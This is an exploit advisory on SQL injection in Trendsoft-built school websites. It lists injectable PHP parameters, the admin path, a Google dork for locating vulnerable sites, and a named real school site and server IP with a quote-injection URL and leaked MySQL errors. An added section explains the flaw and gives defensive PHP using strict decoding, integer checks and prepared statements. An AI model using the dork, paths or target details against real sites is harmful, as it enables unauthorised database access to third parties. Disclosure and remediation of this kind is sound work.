Trendsoft Technologies India SQL Injection Vulnerability

2019.01.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################################
# Exploit Title : Trendsoft Technologies India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : trendsoft.info
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Designed & Maintained by Trendsoft Technologies''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
############################################################
# Admin Panel Login Path :
***********************
/admin/

# SQL Injection Exploit :
*********************
/page_detail.php?sid=Njk=&pid=NTA=[SQL Injection]
/contact_us.php?sid=NQ==[SQL Injection]
/principal_message.php?sid=Mg==[SQL Injection]
/alumni_gallery.php?pid=MQ==[SQL Injection]
/kg_gallery.php?pid=MQ==[SQL Injection]
/video_gallery.php?pid=Ng==[SQL Injection]
/onlineapp/AdmFormfatima.php?id=[SQL Injection]
############################################################
# Example Vulnerable Site =>
**************************
Note => (103.92.235.205) => There are 7 domains hosted on this server.

[+] fatimaconventschool.com/page_detail.php?sid=Njk=&pid=NTA=1%27
[Proof of Concept ] => archive.fo/0S8I0
############################################################
# SQL Database Error :
*********************
cannot execute query select staticId,parentId,staticTitle,externalLink from tbl_fatima_static_pages where enable='Activate' and parentId=505 order by orderOfAppearance asc
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near order by orderOfAppearance asc' at line 1
select * from adminsetup where class=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################
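The error output above shows the page taking a base64-wrapped pid parameter (NTA= decodes to 50), decoding it and placing the result directly into the WHERE clause, then echoing the raw MySQL error to the client. The following PHP is an added example written for this advisory, not Trendsoft's code: the table and column names are taken from the error text, while the function names, the DSN, the credentials and the JSON output are assumptions. It shows the defensive handling such a page needs: strict base64 decoding, a whole-number check before the value is used, a prepared statement so the query text never changes with the input, and a generic error response instead of the database's own message.

```php
<?php
// Added example (not the vendor's code). The advisory's error text shows a query of the shape
//   select staticId,parentId,staticTitle,externalLink from tbl_fatima_static_pages
//   where enable='Activate' and parentId=<decoded pid> order by orderOfAppearance asc
// built by string concatenation; this file handles the same lookup safely.
// Table/column names: from the advisory. Function names, DSN, credentials: assumed.

declare(strict_types=1);

/**
 * Decode a base64-wrapped id such as "NTA=" and return it as an int, or null when the
 * parameter is not strictly valid base64 wrapping a plain decimal integer.
 * base64_decode() runs in strict mode, so an appended quote or other stray character
 * makes decoding fail instead of being silently skipped as it is in non-strict mode.
 */
function decodeNumericId(?string $raw): ?int
{
    if ($raw === null || $raw === '') {
        return null;
    }
    $decoded = base64_decode($raw, true);
    if ($decoded === false) {
        return null;
    }
    // Digits only. \z (not $) so a trailing newline inside the decoded bytes is rejected too.
    if (!preg_match('/^[0-9]{1,9}\z/', $decoded)) {
        return null;
    }
    return (int) $decoded;
}

/**
 * Fetch the child pages with a prepared statement. $parentId is already an int, but
 * binding it keeps the SQL text fixed no matter what the request carried.
 */
function fetchStaticPages(PDO $db, int $parentId): array
{
    $stmt = $db->prepare(
        'SELECT staticId, parentId, staticTitle, externalLink
           FROM tbl_fatima_static_pages
          WHERE enable = :enable AND parentId = :parentId
          ORDER BY orderOfAppearance ASC'
    );
    $stmt->execute([':enable' => 'Activate', ':parentId' => $parentId]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Reject the request when the id does not validate; nothing malformed reaches the query.
$pid = decodeNumericId($_GET['pid'] ?? null);
if ($pid === null) {
    http_response_code(400);
    exit('invalid page id');
}

// Assumed connection details; ERRMODE_EXCEPTION so failures are caught below,
// EMULATE_PREPARES off so MySQL itself prepares the statement.
$db = new PDO('mysql:host=localhost;dbname=example', 'app_user', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

try {
    $pages = fetchStaticPages($db, $pid);
} catch (PDOException $e) {
    // Log the detail server-side only. Echoing the raw MySQL error to the client is
    // exactly what let the advisory above confirm the injection from the response.
    error_log('page_detail lookup failed: ' . $e->getMessage());
    http_response_code(500);
    exit('internal error');
}

header('Content-Type: application/json');
echo json_encode($pages);
```

With this handling a request carrying pid=NTA=1%27 fails at decodeNumericId() (strict decoding rejects the quote) and receives a 400, while a valid pid=NTA= is bound as the integer 50. The integer check and the prepared statement are independent layers: either one alone would stop this particular injection, and keeping both costs nothing.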


Copyright 2019, cxsecurity.com